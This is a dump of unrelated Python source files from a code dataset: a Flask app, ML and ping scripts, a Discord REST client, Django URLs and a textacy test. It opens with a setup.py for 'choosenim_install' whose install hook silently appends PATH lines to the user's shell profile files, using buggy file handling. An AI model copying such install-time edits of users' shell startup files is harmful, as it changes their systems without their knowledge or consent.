f.write(new_path)\n print(f\"OK\\t{ filename }\")\n except:\n warnings.warn(\"Failed to write file ~/.profile\")\n filename = pathlib.Path.home() / \".bash_profile\"\n try:\n if filename.exists():\n found = False\n with open(filename, \"a\") as f:\n for line in f:\n if new_path == line:\n found = True\n if not found:\n f.write(new_path)\n else:\n with open(filename, \"w\") as f:\n f.write(new_path)\n print(f\"OK\\t{ filename }\")\n except:\n warnings.warn(\"Failed to write file ~/.bash_profile\")\n filename = pathlib.Path.home() / \".zshrc\"\n try:\n if filename.exists():\n found = False\n with open(filename, \"a\") as f:\n for line in f:\n if new_path == line:\n found = True\n if not found:\n f.write(new_path)\n else:\n with open(filename, \"w\") as f:\n f.write(new_path)\n print(f\"OK\\t{ filename }\")\n except:\n warnings.warn(\"Failed to write file ~/.zshrc\")\n\n def run(self):\n install.run(self)\n # TODO: nimble has a new \"--noSSLCheck\" that can be added in the future.\n if self.choosenim_setup():\n if self.nimble_setup():\n self.add_to_path()\n else:\n warnings.warn(\"Failed to setup Nimble\")\n else:\n raise Exception(IOError, \"Failed to install choosenim\")\n\nsetuptools.setup(\n name = \"choosenim_install\",\n author = \"Juan_Carlos.nim\",\n cmdclass = {\"install\": X},\n author_email = \"UNKNOWN\",\n url = \"UNKNOWN\",\n)\n","sub_path":"dist/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"237625963","text":"\"\"\" Script to start a Flask web application \"\"\"\nfrom flask import Flask, render_template\n\napp = Flask(__name__)\napp.url_map.strict_slashes = False\nport = 5000\nhost = 
'0.0.0.0'\n\n@app.route('/')\ndef index():\n ''' return the home page '''\n return render_template('login.html')\n\n@app.route('/index')\ndef login():\n ''' returns the login page '''\n return render_template('index.html')\n\nif __name__ == '__main__':\n app.run('0.0.0.0', 5000)\n","sub_path":"web_dynamic/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"471243974","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 17 16:04:19 2020\n\n@author: Lori\n\"\"\"\n\nimport sys\ngenpath = 'D:/Code'\nif genpath not in sys.path:\n sys.path.append(genpath)\n \nimport DataSciPy\nfrom src.knn.main_knn import *\nimport pandas as pd\nimport src.general_helper as genH\nimport scipy.optimize as opt\n\nfinal_db_epfl = pd.read_csv('data/processed/final_db_processed.csv')\n\n# Divide the features into classes on which Hammings distance should be computed\nencode_these_epfl = ['ring_number', \"exposure_type\", \"conc1_type\", \"species\",\n 'tripleBond', 'obs_duration_mean', 'doubleBond', 'alone_atom_number',\n 'class', 'tax_order', 'family', 'genus','exposure_type', 'conc1_type',\n 'species', 'obs_duration_mean', 'class', 'tax_order', 'family', 'genus']\n\ngroup_features_epfl = {0: ['ring_number', \"exposure_type\", \"conc1_type\", \"species\",\n 'tripleBond', 'obs_duration_mean', 'doubleBond', 'alone_atom_number',\n 'class', 'tax_order', 'family', 'genus','exposure_type', 'conc1_type',\n 'species', 'obs_duration_mean', 'class', 'tax_order', 'family', 'genus'],\n 1: ['atom_number', 'bonds_number', 'Mol', 'MorganDensity', 'LogP']}\n\nmetrics_epfl = {0:'hamming', 1:'euclidean'}\n\nalpha_epfl_bin = {0: 0.010826367338740546, 1: 1} # best for binary\nalpha_epfl_mult = {0: 0.017433288221999882, 1: 1} # best for multiclass\nn_neighbors_epfl = 1\nbest_leaf_epfl_bin = 80\nbest_leaf_epfl_mult = 60\n\nfinal_db_epfl_bin = genH.binary_score(final_db_epfl)\nfinal_db_epfl_mult = genH.multi_score(final_db_epfl)\n\n# Test one-hot encoding\ndummy = DataSciPy.Dataset()\ndummy.setup_data(X=final_db_epfl_bin.drop(columns=['test_cas','score']),\n y=final_db_epfl_bin.loc[:,['score']],\n split_test=0.3,\n seed=13)\ndummy.encode_categories(variables=encode_these_epfl, onehot=True)\n\n# Prepare binary run\ndummy = DataSciPy.Dataset()\ndummy.setup_data(X=final_db_epfl_bin.drop(columns=['test_cas','score']),\n y=final_db_epfl_bin.loc[:,['score']],\n split_test=0.3,\n seed=13)\ndummy.encode_categories(variables=encode_these_epfl)\nkep = Knn()\nkep.setup(dummy, group_features=group_features_epfl, alpha=alpha_epfl_bin)\nkep.compute_distance(metrics=metrics_epfl)\nkep.construct_distance_matrix(alpha=alpha_epfl_bin)\nacc = kep.run(n_neighbors=n_neighbors_epfl, leaf_size=best_leaf_epfl_bin) # should be 0.902857\n\n# Prepare multiclass run\ndummy = DataSciPy.Dataset()\ndummy.setup_data(X=final_db_epfl_mult.drop(columns=['test_cas','score']),\n y=final_db_epfl_mult.loc[:,['score']],\n split_test=0.3,\n seed=13)\ndummy.encode_categories(variables=encode_these_epfl)\nkep = Knn()\nkep.setup(dummy, group_features=group_features_epfl, alpha=alpha_epfl_mult)\nkep.compute_distance(metrics=metrics_epfl)\nkep.construct_distance_matrix(alpha=alpha_epfl_mult)\nacc = kep.run(n_neighbors=n_neighbors_epfl, leaf_size=best_leaf_epfl_mult) # should be 
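# construct_distance_matrix is imported from the knn module and not shown in
# this file; a linear combination of per-group distance matrices is one
# plausible reading of the alpha weights above. Illustrative sketch only:
from scipy.spatial.distance import cdist

def combined_distance(X_cat, X_num, alpha):
    # alpha maps group index -> weight, as in alpha_epfl_bin above
    return (alpha[0] * cdist(X_cat, X_cat, metric='hamming')
            + alpha[1] * cdist(X_num, X_num, metric='euclidean'))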
0.7401428","sub_path":"final_zip/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3118,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"311895959","text":"import json\nimport subprocess\n\nclass Measurement:\n def run_ping(self,hostnames = [], num_packets = 0, raw_ping_output_filename = \"\", aggregated_ping_output_filename =\"\"):\n for hostname in hostnames:\n ping_call = subprocess.Popen( [ 'ping', '-c ' + str(num_packets) , hostname ], stdout=subprocess.PIPE )\n ping_result = ping_call.communicate()[0]\n ping_result_array = ping_result.split(' ');\n print (ping_result)\n # retrieve rtts\n ping_time_float = []\n for word in ping_result_array:\n if \"time\" in word:\n print (word[5:])\n if not word[5:]:\n continue\n else:\n ping_time_float.append(float(word[5:]))\n print(ping_time_float)\n\n json_data = []\n json_data.append({\n hostname : ping_time_float\n })\n with open('my_sample_data.json', 'w') as outfile:\n json.dump(json_data, outfile);\n\n def create_json(self):\n data = []\n data.append({\n \"My\" : \"sample sample\"\n })\n\n data.append({\n \"My\" : \"sample sample sample\"\n })\n with open('my_sample_data.json', 'w') as outfile:\n json.dump(data, outfile);\n #\n # def plot_median_rtt_cdf():\n #\n # def plot_ping_cdf():\n\ninstance = Measurement();\ninstance.run_ping(['www.google.com'], 10);\n# instance.create_json();\n","sub_path":"projects/proj3_measurement/rtts.py","file_name":"rtts.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"577491981","text":"import os\nimport time\nimport random\nimport pickle\nimport numpy as np\nimport pandas as pd\nimport argparse\nimport yaml\nfrom model import IRMC_GC_Model, GCMCModel\nfrom utils import *\nfrom datetime import datetime\nimport torch\n\ndef fix_seed(seed):\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed_all(seed)\n torch.backends.cudnn.deterministic = True\nfix_seed(1234)\n\nparser = argparse.ArgumentParser(description='PMF')\nparser.add_argument('--gpus', default='0', help='gpus')\nparser.add_argument('--extra', action=\"store_true\", help='whether extra or inter')\nargs = parser.parse_args()\n\nconfig = yaml.safe_load(open(\"./datainfo.yaml\", 'r'))\n\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = args.gpus\ndevice = torch.device('cuda')\n\nLEARNING_RATE = 0.001\nDECAYING_FACTOR = 1.\nLAMBDA_REG = 0.05\nBATCH_SIZE_TRAIN = 1024\nBATCH_SIZE_TEST = 1024\nHIS_MAXLEN = 100\nHIS_SAMPLE_NUM = 20\nn_epochs = 1 # 500\n\nDATASET = 'ml-100k'\nSPLIT_WAY = 'threshold'\nTHRESHOLD = 30\nSUPP_RATIO = 0.8\nTRAINING_RATIO = 1\nEXTRA = args.extra\n\ndatadir = '../../../data/'\nn_user = config[DATASET]['n_user']\nn_item = config[DATASET]['n_item']\nn_rating = config[DATASET]['n_rating']\n\ntrain_set_supp, train_set_que, test_set_supp, test_set_que, user_supp_list, user_his_dic, edge_UI = \\\ngenerate_data(datadir=datadir, \n\t\t\t\tdataset=DATASET, \n\t\t\t\tsplit_way=SPLIT_WAY,\n\t\t\t\tsupp_ratio=SUPP_RATIO, \n\t\t\t\tthreshold=THRESHOLD,\n\t\t\t\ttraining_ratio=TRAINING_RATIO)\n\nuser_supp_num = len(user_supp_list)\nuser_que_num = n_user - user_supp_num\n\nif SPLIT_WAY == 'all':\n\ttrain_set_supp = torch.tensor(train_set_supp + train_set_que)\nelse:\n\ttrain_set_supp = torch.tensor(train_set_supp)\ntrain_set_que = torch.tensor(train_set_que)\ntest_set_supp = torch.tensor(test_set_supp)\ntest_set_que = 
torch.tensor(test_set_que)\nsupp_users = torch.tensor(user_supp_list, dtype = torch.long)\nedge_IU = []\t\nfor n in range(n_rating):\n\tedge_UI[n] = torch.tensor(edge_UI[n])\n\tedge_IU_n = edge_UI[n].transpose(1, 0).contiguous()\n\tedge_IU.append(edge_IU_n)\n\ndef sequence_adjust(seq):\n\tseq_new = seq\n\tif len(seq) <= 0:\n\t\tseq_new = [np.random.randint(0, n_item) for i in range(HIS_SAMPLE_NUM)]\n\tif len(seq) > HIS_MAXLEN:\n\t\trandom.shuffle(seq)\n\t\tseq_new = seq[:HIS_MAXLEN]\n\treturn seq_new\n\ndef train(model, optimizer, i, supp_or_que):\n\tmodel.train()\n\toptimizer.zero_grad()\n\t\n\tif supp_or_que == 'supp':\n\t\ttrain_set_supp_i = train_set_supp[i*BATCH_SIZE_TRAIN : (i+1)*BATCH_SIZE_TRAIN]\n\t\ttrain_set_supp_i_x = train_set_supp_i[:, :2].long().to(device)\n\t\ttrain_set_supp_i_y = train_set_supp_i[:, 2].float().to(device)\n\t\tedge_UI_i = [edge_UI[n][train_set_supp_i_x[:, 0]].to(device) for n in range(n_rating)]\n\t\tedge_IU_i = [edge_IU[n][train_set_supp_i_x[:, 1]].to(device) for n in range(n_rating)]\n\n\t\tpred_y = model(train_set_supp_i_x, edge_UI_i, edge_IU_i)\n\t\tloss_r = torch.sum((train_set_supp_i_y - pred_y) ** 2)\n\t\tloss_reg = model.regularization_loss()\n\t\tloss = loss_r + LAMBDA_REG * loss_reg\n\telse:\n\t\ttrain_set_que_i = train_set_que[i*BATCH_SIZE_TRAIN : (i+1)*BATCH_SIZE_TRAIN]\n\t\ttrain_set_i_x = train_set_que_i[:, :2].long().to(device)\n\t\ttrain_set_i_y = train_set_que_i[:, 2].float().to(device)\n\t\ttrain_set_his_i = [torch.tensor(\n\t\tsequence_adjust( user_his_dic[train_set_que_i[k][0].item()] ),\n\t\tdtype = torch.long\n\t\t) for k in range(train_set_que_i.size(0))]\n\t\ttrain_set_hl_i = [train_set_his_i[k].size(0) for k in range(train_set_que_i.size(0))]\n\t\ttrain_set_his_i = torch.nn.utils.rnn.pad_sequence(train_set_his_i, batch_first = True, padding_value = 0.).to(device)\n\t\ttrain_set_hl_i = torch.tensor(train_set_hl_i, dtype=torch.long).to(device)\n\t\tedge_UI_i = [edge_UI[n][train_set_i_x[:, 0]].to(device) for n in range(n_rating)]\n\t\tedge_IU_i = [edge_IU[n][train_set_i_x[:, 1]].to(device) for n in range(n_rating)]\n\t\tpred_y = model(train_set_i_x, train_set_his_i, train_set_hl_i, edge_UI_i, edge_IU_i)\n\t\tloss = torch.sum((train_set_i_y - pred_y) ** 2)\n\t\t\n\tloss.backward()\n\ndef test(model, test_set, supp_or_que):\n\tmodel.eval()\n\tloss_r_test_sum, l1_sum, l2_sum, ndcg_sum, num = 0., 0., 0., 0., 0\n\ttest_size = test_set.size(0)\n\tuser_score_dict, user_label_dict = {}, {}\n\tfor k in user_his_dic.keys():\n\t\tuser_score_dict[k] = []\n\t\tuser_label_dict[k] = []\n\tfor i in range(test_size // BATCH_SIZE_TEST + 1):\n\t\twith torch.no_grad():\n\t\t\ttest_set_i = test_set[i*BATCH_SIZE_TEST : (i+1)*BATCH_SIZE_TEST]\n\t\t\ttest_set_i_x = test_set_i[:, :2].long().to(device)\n\t\t\ttest_set_i_y = test_set_i[:, 2].float().to(device)\n\t\t\ttest_set_his_i = [torch.tensor(\n\t\t\t\tsequence_adjust( user_his_dic[test_set_i[k][0].item()] ),\n\t\t\t\tdtype = torch.long\n\t\t\t\t) for k in range(test_set_i.size(0))]\n\t\t\ttest_set_hl_i = [test_set_his_i[k].size(0) for k in range(test_set_i.size(0))]\n\t\t\ttest_set_his_i = torch.nn.utils.rnn.pad_sequence(test_set_his_i, batch_first = True, padding_value = 0.).to(device)\n\t\t\ttest_set_hl_i = torch.tensor(test_set_hl_i, dtype=torch.long).to(device)\n\t\t\tedge_UI_i = [edge_UI[n][test_set_i_x[:, 0]].to(device) for n in range(n_rating)]\n\t\t\tedge_IU_i = [edge_IU[n][test_set_i_x[:, 1]].to(device) for n in range(n_rating)]\n\n\t\t\tif supp_or_que == 'supp':\n\t\t\t\tpred_y = 
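# The history padding above in miniature: pad_sequence right-pads a list of
# variable-length index tensors into one (batch, max_len) tensor.
# Standalone illustration:
import torch
seqs = [torch.tensor([1, 2, 3]), torch.tensor([4])]
padded = torch.nn.utils.rnn.pad_sequence(seqs, batch_first=True, padding_value=0.)
# padded.shape == torch.Size([2, 3])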
model(test_set_i_x, edge_UI_i, edge_IU_i)\n\t\t\telse:\n\t\t\t\tpred_y = model(test_set_i_x, test_set_his_i, test_set_hl_i, edge_UI_i, edge_IU_i)\n\t\t\tloss_r = torch.sum((test_set_i_y - pred_y) ** 2)\n\t\ty_hat, y = pred_y.cpu().numpy(), test_set_i_y.cpu().numpy()\n\t\tloss_r_test_sum += loss_r.item()\n\t\tl1_sum += np.sum( np.abs(y_hat - y) )\n\t\tl2_sum += np.sum( np.square(y_hat - y) )\n\t\tfor k in range(test_set_i.size(0)):\n\t\t\tu, s, y = test_set_i_x[k, 0].item(), pred_y[k].item(), test_set_i_y[k].item()\n\t\t\tuser_score_dict[u] += [s]\n\t\t\tuser_label_dict[u] += [y]\n\tTestLoss = loss_r_test_sum / test_size\n\tMAE = l1_sum / test_size\n\tRMSE = np.sqrt( l2_sum / test_size )\n\tfor k in user_score_dict.keys():\n\t\tif len(user_score_dict[k]) <= 1:\n\t\t\tcontinue\n\t\tndcg_sum += ndcg_k(user_score_dict[k], user_label_dict[k], len(user_score_dict[k]))\n\t\tnum += 1\n\treturn TestLoss, MAE, RMSE, ndcg_sum, num\n\ndef load_model_s(model, path):\n\tmodel.load_model(path+'model.pkl')\n\ndef load_model_q(model, path):\n\tif EXTRA:\n\t\tmodel.load_model(path + 'model-extra.pkl')\n\telse:\n\t\tmodel.load_model(path+'model-inter.pkl')\n\n\nif EXTRA:\n\tmodel_q = IRMC_GC_Model(n_user=n_user,\n\t\t\t\t\t\t\tn_item=n_item,\n\t\t\t\t\t\t\tn_rating=n_rating,\n\t\t\t\t\t\t\tsupp_users=supp_users,\n\t\t\t\t\t\t\tembedding_size=32,\n\t\t\t\t\t\t\thidden_size=32,\n\t\t\t\t\t\t\tdevice=device).to(device)\n\tload_model_q(model_q, './train-100k/')\n\tloss_r_test, MAE_q, RMSE_q, ndcg_sum_q, num_q = test(model_q, test_set_que, supp_or_que='que')\n\tNDCG_q = ndcg_sum_q / num_q\n\tlog = 'Que Test Result: MAE: {:.4f} RMSE: {:.4f} NDCG: {:.4f}'.format(MAE_q, RMSE_q, NDCG_q)\n\tprint(log)\nelse:\n\tmodel_s = GCMCModel(n_user = n_user,\n\t\t\t\t\tn_item = n_item,\n\t\t\t\t\tn_rating = n_rating,\n\t\t\t\t\tembedding_size=32,\n\t\t\t\t\thidden_size=32,\n\t\t\t\t\tdevice = device).to(device)\n\tload_model_s(model_s, './pretrain-100k/')\n\tloss_r_test, MAE_s, RMSE_s, ndcg_sum_s, num_s = test(model_s, test_set_supp, supp_or_que='supp')\n\tNDCG_s = ndcg_sum_s / num_s\n\tlog = 'Key Test Result: MAE: {:.4f} RMSE: {:.4f} NDCG: {:.4f}'.format(MAE_s, RMSE_s, NDCG_s)\n\tprint(log)\n\n\tmodel_q = IRMC_GC_Model(n_user = n_user,\n\t\t\t\t\tn_item = n_item,\n\t\t\t\t\tn_rating = n_rating,\n\t\t\t\t\tsupp_users = supp_users,\n\t\t\t\t\tembedding_size=32,\n\t\t\t\t\thidden_size=32,\n\t\t\t\t\tdevice = device).to(device)\n\tload_model_q(model_q, './train-100k/')\n\n\tloss_r_test, MAE_q, RMSE_q, ndcg_sum_q, num_q = test(model_q, test_set_que, supp_or_que='que')\n\tNDCG_q = ndcg_sum_q / num_q\n\tlog = 'Que Test Result: MAE: {:.4f} RMSE: {:.4f} NDCG: {:.4f}'.format(MAE_q, RMSE_q, NDCG_q)\n\tprint(log)\n\n\tsupp_size, que_size = test_set_supp.size(0), test_set_que.size(0)\n\tMAE = ( MAE_s * supp_size + MAE_q * que_size )/ (supp_size+que_size)\n\tRMSE = np.sqrt( (RMSE_s**2 * supp_size + RMSE_q**2 * que_size) / (supp_size+que_size))\n\tNDCG = (ndcg_sum_q + ndcg_sum_s) / (num_q + num_s)\n\tlog = 'All Test Result: MAE: {:.4f} RMSE: {:.4f} NDCG: {:.4f}'.format(MAE, RMSE, NDCG)\n\tprint(log)","sub_path":"code/douban/IDCF-GC/test-100k.py","file_name":"test-100k.py","file_ext":"py","file_size_in_byte":7969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"305559766","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 28 11:54:53 2018\n\n@author: beleaf\n\"\"\"\n\n#type1 - simplest type,only use add_formula function without parameter\n\ndef run_formula(dv):\n alpha133 = 
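# The expression registered below has the shape of a 20-day Aroon oscillator:
# 100*(20 - bars_since_high)/20 minus 100*(20 - bars_since_low)/20, assuming
# Ts_Argmax/Ts_Argmin return the offset of the rolling max/min. Worked
# numbers (made up):
bars_since_high, bars_since_low = 3, 15
aroon = (20 - bars_since_high) / 20 * 100 - (20 - bars_since_low) / 20 * 100
# aroon == 60.0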
dv.add_formula('alpha133', \n \"(((20-Ts_Argmax(high,20))/20) * 100 - ((20-Ts_Argmin(low,20))/20) * 100)\"\n , is_quarterly=False)\n return alpha133","sub_path":"复现因子py文件/alpha133.py","file_name":"alpha133.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"234056851","text":"\"\"\"\nMIT License\n\nCopyright (c) 2021 Bluenix\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\"\"\"\n\nimport asyncio\nimport sys\nfrom datetime import datetime, timezone\nfrom typing import Any, Dict, Optional, Union\nfrom urllib.parse import quote as urlquote\n\nimport aiohttp\n\nfrom ..errors import (\n Forbidden, HTTPException, NotFound, RequestException, ServerException\n)\nfrom ..utils import MISSING\nfrom .locks import Lock\nfrom .ratelimiter import DictRateLimiter, RateLimiter, Route\n\ntry:\n import orjson\n\n def orjson_dump(obj: Any) -> str:\n # orjson returns bytes but aiohttp expects a string\n return orjson.dumps(obj).decode('utf-8')\n\n dump = orjson_dump\nexcept ImportError:\n import json\n\n dump = json.dumps\n\n__all__ = ('build_user_agent', 'Requester')\n\n\ndef build_user_agent() -> str:\n \"\"\"Build a User-Agent to use in making requests.\"\"\"\n from wumpy import __version__ # Avoid circular imports\n\n agent = f'DiscordBot (https://github.com/Bluenix2/wumpy, version: {__version__})'\n agent += f' Python/{sys.version_info[0]}.{sys.version_info[1]}'\n\n return agent\n\n\nclass Requester:\n \"\"\"A class to make requests against Discord's API, respecting ratelimits.\n\n This class itself does not actually contain any routes, that way it can be\n re-used and subclassed for several purposes.\n \"\"\"\n\n headers: Dict[str, str]\n\n ratelimiter: RateLimiter\n\n _session: aiohttp.ClientSession\n\n __slots__ = ('headers', 'ratelimiter', '_session')\n\n def __init__(self, ratelimiter=DictRateLimiter, *, headers: Dict[str, str] = {}) -> None:\n # Headers global to the requester\n self.headers: Dict[str, str] = {\n 'User-Agent': build_user_agent(),\n 'X-RateLimit-Precision': 'millisecond',\n **headers,\n }\n\n self.ratelimiter = ratelimiter()\n self._session = aiohttp.ClientSession(headers=self.headers, json_serialize=dump)\n\n @staticmethod\n def _clean_dict(mapping: Dict[Any, Any]) -> Dict[Any, Any]:\n \"\"\"Clean a dictionary from MISSING values.\n\n Returned is a new dictionary with only the keys not having a\n MISSING value left.\n \"\"\"\n return {k: v for k, v in mapping.items() if v is not MISSING}\n\n async def 
_handle_ratelimit(self, data: Dict[str, Any]) -> None:\n \"\"\"Handle an unexpected 429 response.\"\"\"\n retry_after: float = data['retry_after']\n\n is_global: bool = data.get('global', False)\n if is_global:\n self.ratelimiter.lock() # Globally lock all requests\n\n await asyncio.sleep(retry_after)\n\n if is_global:\n self.ratelimiter.unlock() # Release now that the global ratelimit has passed\n\n async def _request(\n self,\n route: Route,\n headers: Dict[str, str],\n ratelimit: Lock,\n attempt: int,\n **params: Any\n ) -> Optional[Any]:\n \"\"\"Attempt to actually make the request.\n\n None is returned if the request got a bad response which was handled\n and the function should be called again to retry.\n \"\"\"\n async with self._session.request(route.method, route.url, headers=headers, **params) as res:\n text = await res.text(encoding='utf-8')\n if res.headers.get('Content-Type') == 'application/json':\n # Parse the response\n data = json.loads(text)\n else:\n data = text\n\n # Update rate limit information if we have received it\n self.ratelimiter.update(route, res.headers.get('X-RateLimit-Bucket'))\n\n if res.headers.get('X-RateLimit-Remaining') == '0':\n ratelimit.defer()\n\n reset = datetime.fromtimestamp(float(res.headers['X-Ratelimit-Reset']), timezone.utc)\n # Release later when the ratelimit reset\n asyncio.get_running_loop().call_later(\n (reset - datetime.now(timezone.utc)).total_seconds(),\n ratelimit.release\n )\n\n # Successful request\n if 300 > res.status >= 200:\n return data\n\n # In all of these error cases the response will be a dict\n assert isinstance(data, dict) # For the static type checking\n\n # We're being ratelimited by Discord\n if res.status == 429:\n # Returning None will cause the function to try again\n return await self._handle_ratelimit(data)\n\n elif res.status in {500, 502, 504}:\n # Unconditionally sleep and retry\n await asyncio.sleep(1 + attempt * 2)\n return None\n\n elif res.status == 403:\n raise Forbidden(res, data)\n elif res.status == 404:\n raise NotFound(res, data)\n elif res.status == 503:\n raise ServerException(res, data)\n else:\n raise RequestException(res, data)\n\n async def request(self, route: Route, *, reason: str = MISSING, **kwargs: Any) -> Any:\n \"\"\"Make a request to the Discord API, respecting rate limits.\n\n If the `json` keyword-argument contains values that are MISSING,\n they will be removed before being passed to aiohttp.\n\n This function returns a deserialized JSON object if Content-Type is\n `application/json`, otherwise a string. Commonly it is known by the\n caller itself what the response will be, in which case it will be\n a burden to narrow down the type unneccesarily. 
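# Sketch of the bucket-reset arithmetic used in _request above: Discord
# reports the reset moment as a Unix timestamp, and the lock is released once
# that moment passes. Hypothetical standalone version:
from datetime import datetime, timezone

def seconds_until_reset(headers):
    reset = datetime.fromtimestamp(float(headers['X-Ratelimit-Reset']), timezone.utc)
    return max(0.0, (reset - datetime.now(timezone.utc)).total_seconds())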
For that reason this\n function is annotated as returning `Any`.\n \"\"\"\n\n # Clean up MISSING values\n if 'json' in kwargs:\n kwargs['json'] = self._clean_dict(kwargs['json'])\n\n # Create the headers for the request\n headers: dict[str, str] = {}\n\n # The second part of the if-statement is to check if the value is\n # truthy, otherwise we'll send an X-Audit-Log-Reason of None\n if reason is not MISSING:\n headers['X-Audit-Log-Reason'] = urlquote(reason, safe='/ ')\n\n for attempt in range(5):\n async with self.ratelimiter.get(route) as rl:\n try:\n res = await self._request(route, headers, rl, attempt, **kwargs)\n except OSError as error:\n # Connection reset by peer\n if attempt < 4 and error.errno in (54, 10054):\n # Exponentially backoff and try again\n await asyncio.sleep(1 + attempt * 2)\n continue\n\n # The last attempt or some other error\n raise error\n\n if res is None:\n continue # Something went wrong, let's retry\n\n return res\n\n raise HTTPException(f'All attempts at {route} failed')\n\n async def _bypass_request(\n self,\n method: str,\n url: str,\n body: Dict[str, Any] = None,\n **query: Union[str, int]\n ) -> bytes:\n \"\"\"Bypass retrying, ratelimit handling and json serialization.\n\n The point of this function is to make a \"raw\" request somewhere.\n Commonly to a CDN endpoint, that does not have ratelimits and needs to\n read the bytes.\n \"\"\"\n async with self._session.request(method, url, json=body, params=query) as res:\n if res.status == 200:\n return await res.read()\n\n data = json.loads(await res.text())\n\n if res.status == 403:\n raise Forbidden(res, data)\n elif res.status == 404:\n raise NotFound(res, data)\n elif res.status == 503:\n raise ServerException(res, data)\n else:\n raise RequestException(res, data)\n","sub_path":"wumpy/rest/requester.py","file_name":"requester.py","file_ext":"py","file_size_in_byte":8821,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"387505355","text":"from django.conf.urls import patterns, include, url\nfrom django.contrib import admin\nfrom nutrition import settings\nfrom .views import *\n\nurlpatterns = patterns('',\n # Examples:\n url(r'^login/$', user_login, name='login'),\n url(r'^logout$', logout_page, name='logout'),\n url(r'^home/$', home, name='home'),\n url(r'^clinica/', include('clinic.urls')),\n\n url(r'^admin/', include(admin.site.urls)),\n\n (r'^static/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.STATIC_ROOT}),\n (r'^media/(?P.*)$', 'django.views.static.serve',\n {'document_root': settings.MEDIA_ROOT, 'show_indexes': True}),\n)\n","sub_path":"nutrition/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"254039393","text":"# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, unicode_literals\n\nimport collections\nimport unittest\n\nfrom spacy.tokens import Span as SpacySpan\nfrom spacy.tokens import Token as SpacyToken\n\nfrom textacy import cache, constants, extract\n\n\nclass ExtractTestCase(unittest.TestCase):\n\n def setUp(self):\n self.maxDiff = None\n spacy_lang = cache.load_spacy('en')\n text = \"\"\"\n Two weeks ago, I was in Kuwait participating in an I.M.F. seminar for Arab educators. For 30 minutes, we discussed the impact of technology trends on education in the Middle East. 
And then an Egyptian education official raised his hand and asked if he could ask me a personal question: \"I heard Donald Trump say we need to close mosques in the United States,\" he said with great sorrow. \"Is that what we want our kids to learn?\"\n \"\"\"\n self.spacy_doc = spacy_lang(text.strip())\n\n def test_words(self):\n expected = [\n 'Two', 'weeks', 'ago', ',', 'I', 'was', 'in', 'Kuwait', 'participating',\n 'in', 'an', 'I.M.F.', 'seminar', 'for', 'Arab', 'educators', '.', 'For',\n '30', 'minutes', ',', 'we', 'discussed', 'the', 'impact']\n observed = [tok.text for tok in extract.words(\n self.spacy_doc, filter_stops=False, filter_punct=False, filter_nums=False)][:25]\n self.assertEqual(observed, expected)\n\n def test_words_filter(self):\n result = [tok for tok in extract.words(\n self.spacy_doc, filter_stops=True, filter_punct=True, filter_nums=True)]\n self.assertTrue(not any(tok.is_stop for tok in result))\n self.assertTrue(not any(tok.is_punct for tok in result))\n self.assertTrue(not any(tok.like_num for tok in result))\n\n def test_words_good_tags(self):\n result = [tok for tok in extract.words(\n self.spacy_doc, filter_stops=False, filter_punct=False, filter_nums=False,\n include_pos={'NOUN'})]\n self.assertTrue(all(tok.pos_ == 'NOUN' for tok in result))\n\n def test_words_min_freq(self):\n counts = collections.Counter()\n counts.update(tok.lower_ for tok in self.spacy_doc)\n result = [tok for tok in extract.words(\n self.spacy_doc, filter_stops=False, filter_punct=False, filter_nums=False,\n min_freq=2)]\n self.assertTrue(all(counts[tok.lower_] >= 2 for tok in result))\n\n def test_ngrams_less_than_1(self):\n with self.assertRaises(ValueError):\n list(extract.ngrams(self.spacy_doc, 0))\n\n def test_ngrams_n(self):\n for n in (1, 2):\n result = [span for span in extract.ngrams(\n self.spacy_doc, n,\n filter_stops=False, filter_punct=False, filter_nums=False)]\n self.assertTrue(all(len(span) == n for span in result))\n self.assertTrue(all(isinstance(span, SpacySpan) for span in result))\n\n def test_ngrams_filter(self):\n result = [span for span in extract.ngrams(\n self.spacy_doc, 2, filter_stops=True, filter_punct=True, filter_nums=True)]\n self.assertTrue(not any(span[0].is_stop or span[-1].is_stop for span in result))\n self.assertTrue(not any(tok.is_punct for span in result for tok in span))\n self.assertTrue(not any(tok.like_num for span in result for tok in span))\n\n def 